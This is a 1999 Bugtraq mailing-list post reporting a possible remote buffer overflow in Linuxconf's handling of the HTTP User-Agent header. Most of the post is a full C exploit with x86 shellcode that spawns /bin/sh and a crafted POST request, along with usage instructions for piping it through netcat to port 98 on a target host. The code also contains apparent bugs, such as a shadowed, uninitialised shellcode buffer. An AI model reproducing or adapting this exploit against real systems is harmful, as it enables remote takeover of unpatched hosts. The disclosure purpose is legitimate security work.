=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


    Date: Вт, 21 дек 1999  21:31:14

   От: Elias Levy <aleph1@SECURITYFOCUS.COM>

 Кому: BUGTRAQ@SECURITYFOCUS.COM

 Тема: (Possible) Linuxconf Remote Buffer Overflow Vulnerability

--------------------------------------------------------------------------------




There may exists a buffer overflow vulnerability in the Linuxconf package

shipped with some version of Linux systems. The vulnerability may

be in the program's handling of HTTP headers. Initial testing with

Linuxconf 1.16r10 under RedHat 6.0 was inconclusive. If other can

test the exploit and report their results it would be appreciated.



This is an example of what good can happen from sharing security

incident information. There have been reports in the INCIDENTS mailing

list for several months now of scans for port 98. Since no

publicly known major vulnerabilities existed in this service the

traffic was somewhat strange. After some digging around

Jon Starnaud <jon.starnaud@rci.com> was able to find this exploit.



If you are not subscribed to INCIDENTS and wish to share incident

information I suggest you sign up. If the vulnerability does exists

this would be the second vulnerability we discover thanks to sharing

incident information (the first one being sadmind).



http://www.securityfocus.com/forums/incidents/faq.html



/*



  linuxconf exploit by R00T-X (c) 1999



  USER_AGENT overflow x86

  should work on all linux's but you need to have

  network access to linuxconf



  greetz to: j0e, AcidCrunCh, |420|, umm and everyone who knows me, heh :P



  have fun with this but for EDUCATIONAL PURPOSES :)



  Usage:   (./linexp <offset>;cat)| nc targethost 98



 */



char shell[] =

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\xeb\x3b\x5e\x89\x76\x08\x31\xed\x31\xc9\x31\xc0\x88"

"\x6e\x07\x89\x6e\x0c\xb0\x0b\x89\xf3\x8d\x6e\x08\x89\xe9\x8d\x6e"

"\x0c\x89\xea\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\xe8\xc0\xff\xff\xff/bin/sh\x00";



#include <stdio.h>

#include <stdlib.h>

#include <limits.h>

#include <string.h>



#define BUFLEN 1025

#define NOP 0x90



void

main (int argc, char *argv[])

{

  char buf[BUFLEN];

  int offset,nop,i;

  unsigned long esp;

  char shell[1024+300];



  if(argc < 2)

  {

  fprintf(stderr,"usage: (%s <offset>;cat)|nc host.com 98\n", argv[0]);

  exit(0);

  }



  nop = 511;

  esp = 0xefbfd5e8;

  offset = atoi(argv[1]);



  memset(buf, NOP, BUFLEN);

  memcpy(buf+(long)nop, shell, strlen(shell));



  for (i = 256; i < BUFLEN - 3; i += 2)

{    *((int *) &buf[i]) = esp + (long) offset;

     shell[ sizeof(shell)-1 ] = 0;

}



 printf("POST / HTTP/1.0\r\nContent-Length: %d, User-agent: \r\n", BUFLEN);

  for (i = 0; i < BUFLEN; i++)

    putchar(buf[i]);



  printf("\r\n");



  return;

}





--

Elias Levy

Security Focus

http://www.securityfocus.com/